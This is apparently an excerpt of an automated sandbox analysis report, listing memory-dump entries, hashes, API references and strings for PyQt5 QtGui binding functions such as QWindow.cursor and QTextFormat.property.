Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Surface@@Type@$?surfaceOffscreenSurface
String ID: QWindow$surfaceType$surfaceType(self) -> QSurface.SurfaceType
API String ID: 798145355-1988457653
Opcode ID: e3a64dde6cbd964a6f13f4986f5d92d87f1873855a63675355a66f54f4550e01
Instruction ID: e225478563cee2bcac38681cb3bde2ca9c3b45e17b84415b2238fc0957d4c683
Opcode Fuzzy Hash: e3a64dde6cbd964a6f13f4986f5d92d87f1873855a63675355a66f54f4550e01
Instruction Fuzzy Hash: 8D218EB2B08A4685EB649B34E4482B9B7A8FF95B84F144072DE8C43774EF7CD088D700

Function 00007FFB9A36F8A0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

PyType_GetFlags.PYTHON3 ref: 00007FFB9A36F8C9
PyArg_ParseTuple.PYTHON3 ref: 00007FFB9A36F8EA
PyErr_Format.PYTHON3 ref: 00007FFB9A36F926

Strings

an index must be a row in the range 0 to %d and a column in the range 0 to %d, xrefs: 00007FFB9A36F91C

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Arg_Err_FlagsFormatParseTupleType_
String ID: an index must be a row in the range 0 to %d and a column in the range 0 to %d
API String ID: 2941527345-3448741815
Opcode ID: 8430ba9835349edbd87556cbe938e83603d9ef9daf59eff5838e2381ff076032
Instruction ID: 113e429a922b1edab97a162b37cbd7ed8b686833a5546eeb6f6337d5a6a7edd5
Opcode Fuzzy Hash: 8430ba9835349edbd87556cbe938e83603d9ef9daf59eff5838e2381ff076032
Instruction Fuzzy Hash: 39115E71B0CA5696E7208B22E84116973A8FB85F84F54407AEF9E93B58CE3CE546CB00

Function 00007FFB9A30F940 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?lengthProperty@QTextFormat@@QEBA?AVQTextLength@@H@Z.QT5GUI ref: 00007FFB9A30F9A6

Strings

QTextFrameFormat, xrefs: 00007FFB9A30F9EA
width(self) -> QTextLength, xrefs: 00007FFB9A30F9D7
width, xrefs: 00007FFB9A30F9E3

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Text$?lengthFormat@@Length@@Property@malloc
String ID: QTextFrameFormat$width$width(self) -> QTextLength
API String ID: 104013036-2383216366
Opcode ID: 38faebaa1914abc80bde853c064af3cd0f5c83fd97bfaa017b3b57c8e83a5b9f
Instruction ID: 8529f5e5af3c4a6e427891465b4d431d85f5e0d1fdaf7d196462d292823de92d
Opcode Fuzzy Hash: 38faebaa1914abc80bde853c064af3cd0f5c83fd97bfaa017b3b57c8e83a5b9f
Instruction Fuzzy Hash: 4B1148B5B18B56C1EB108F25E8486A937A8FB99B84FA140B6DE4D07320DF7DD549C740

Function 00007FFB9A3419E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?property@QTextFormat@@QEBA?AVQVariant@@H@Z.QT5GUI ref: 00007FFB9A341A45

Strings

property, xrefs: 00007FFB9A341A7D
property(self, propertyId: int) -> Any, xrefs: 00007FFB9A341A71
QTextFormat, xrefs: 00007FFB9A341A84

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?property@Format@@TextVariant@@malloc
String ID: QTextFormat$property$property(self, propertyId: int) -> Any
API String ID: 3525565995-3619573118
Opcode ID: a7fcbec7fc1514ad025da534389e845a70303f2dfb07b8e9a4e9eb8ec6d686c9
Instruction ID: 9d8e4aff01d748a973437ec110c650439adc4233af70acf2b954334714060896
Opcode Fuzzy Hash: a7fcbec7fc1514ad025da534389e845a70303f2dfb07b8e9a4e9eb8ec6d686c9
Instruction Fuzzy Hash: F0110AB5B18A4681EB10DF35D8586A933A9FB45B84FA18076CE4C43320DF3DD94AC740

Function 00007FFB9A343A10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?colorProperty@QTextFormat@@QEBA?AVQColor@@H@Z.QT5GUI ref: 00007FFB9A343A75

Strings

colorProperty(self, propertyId: int) -> QColor, xrefs: 00007FFB9A343AA1
QTextFormat, xrefs: 00007FFB9A343AB4
colorProperty, xrefs: 00007FFB9A343AAD

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?colorColor@@Format@@Property@Textmalloc
String ID: QTextFormat$colorProperty$colorProperty(self, propertyId: int) -> QColor
API String ID: 2985419813-556251507
Opcode ID: c37e459ebbf1ec6c7fde5545124aceafa061cc867046ae4f76762534b2b3d287
Instruction ID: b647c5f836f0bb1dea61a4ecc5d8bd8dafdf02b5816cea17c8cad3e11e39987e
Opcode Fuzzy Hash: c37e459ebbf1ec6c7fde5545124aceafa061cc867046ae4f76762534b2b3d287
Instruction Fuzzy Hash: 2E114CB5B18A46C5EB10DF35E8886A933A8FB45B84FA14076DA4C43320CF3DD549C740

Function 00007FFB9A30BEF0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?cursor@QWindow@@QEBA?AVQCursor@@XZ.QT5GUI ref: 00007FFB9A30BF48

Strings

cursor, xrefs: 00007FFB9A30BF80
cursor(self) -> QCursor, xrefs: 00007FFB9A30BF74
QWindow, xrefs: 00007FFB9A30BF87

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?cursor@Cursor@@Window@@malloc
String ID: QWindow$cursor$cursor(self) -> QCursor
API String ID: 2860300759-1668880385
Opcode ID: 69be702e468362f1bd71fb5158563cf982a12c9e9e08dcf7ed756cdfe2cd2068
Instruction ID: 07d1ae22b01f68660fe11a5787bb40fcbe14c01f39b156fb088f7e6791658b98
Opcode Fuzzy Hash: 69be702e468362f1bd71fb5158563cf982a12c9e9e08dcf7ed756cdfe2cd2068
Instruction Fuzzy Hash: 5E115BB5B08A5681FB50DF75E8586A933A8FB85B84FA140B6CD5D03320CF7CD589C740

Function 00007FFB9A303EC0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?discardCommand@QSessionManager@@QEBA?AVQStringList@@XZ.QT5GUI ref: 00007FFB9A303F18

Strings

discardCommand(self) -> List[str], xrefs: 00007FFB9A303F44
QSessionManager, xrefs: 00007FFB9A303F57
discardCommand, xrefs: 00007FFB9A303F50

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?discardCommand@List@@Manager@@SessionStringmalloc
String ID: QSessionManager$discardCommand$discardCommand(self) -> List[str]
API String ID: 1524762267-3557297886
Opcode ID: aa8cf092a7c0d09c87d1ca4e65e314cce4992f861144479576a2b979a166d475
Instruction ID: f0512ca167e3e830b37497c3129c2207435cc55b855d242a92ed908d4cf97e29
Opcode Fuzzy Hash: aa8cf092a7c0d09c87d1ca4e65e314cce4992f861144479576a2b979a166d475
Instruction Fuzzy Hash: BF112DB5B08A96C1EB10DF75E8996A933A8FB55B84FA180B6CE4D13320DF7DD549C340

Function 00007FFB9A2F5EC0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?boundingRect@QTextLayout@@QEBA?AVQRectF@@XZ.QT5GUI ref: 00007FFB9A2F5F18

Strings

QTextLayout, xrefs: 00007FFB9A2F5F57
boundingRect, xrefs: 00007FFB9A2F5F50
boundingRect(self) -> QRectF, xrefs: 00007FFB9A2F5F44

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?boundingLayout@@RectRect@Textmalloc
String ID: QTextLayout$boundingRect$boundingRect(self) -> QRectF
API String ID: 620106861-2289836743
Opcode ID: d6a6e2bae909e763cc0f0e69c341b9404335dca903f927abcbb307d81ef0c13c
Instruction ID: c63162f6123d41dae39b4b09d9ef10fcdf734a3f5bc107447d3e3209c595b320
Opcode Fuzzy Hash: d6a6e2bae909e763cc0f0e69c341b9404335dca903f927abcbb307d81ef0c13c
Instruction Fuzzy Hash: 121135B5B08A4681EB209F65E8586A933A8FB95B84FA180B2CE0C43320DF7CE549C340

Function 00007FFB9A339AC0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?toVector4D@QVector2D@@QEBA?AVQVector4D@@XZ.QT5GUI ref: 00007FFB9A339B18

Strings

toVector4D, xrefs: 00007FFB9A339B50
toVector4D(self) -> QVector4D, xrefs: 00007FFB9A339B44
QVector2D, xrefs: 00007FFB9A339B57

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Vector4$Vector2malloc
String ID: QVector2D$toVector4D$toVector4D(self) -> QVector4D
API String ID: 311956697-3690013905
Opcode ID: e5904921a024085fc3ee456001a23ef0ffaa9fab3ce9227f7a8231a42308805b
Instruction ID: 34d7b9161dc21028d97d1a00722a84531bd1428ea0e71863e22bbde88d220905
Opcode Fuzzy Hash: e5904921a024085fc3ee456001a23ef0ffaa9fab3ce9227f7a8231a42308805b
Instruction Fuzzy Hash: 44115BB5B08A46C1EB10DF75E8986A937A8FB54B84FA180B6CD0C47320CF7CE58AC740

Function 00007FFB9A317ED0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?windowStates@QWindow@@QEBA?AV?$QFlags@W4WindowState@Qt@@@@XZ.QT5GUI ref: 00007FFB9A317F28

Strings

QWindow, xrefs: 00007FFB9A317F67
windowStates, xrefs: 00007FFB9A317F60
windowStates(self) -> Qt.WindowStates, xrefs: 00007FFB9A317F54

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
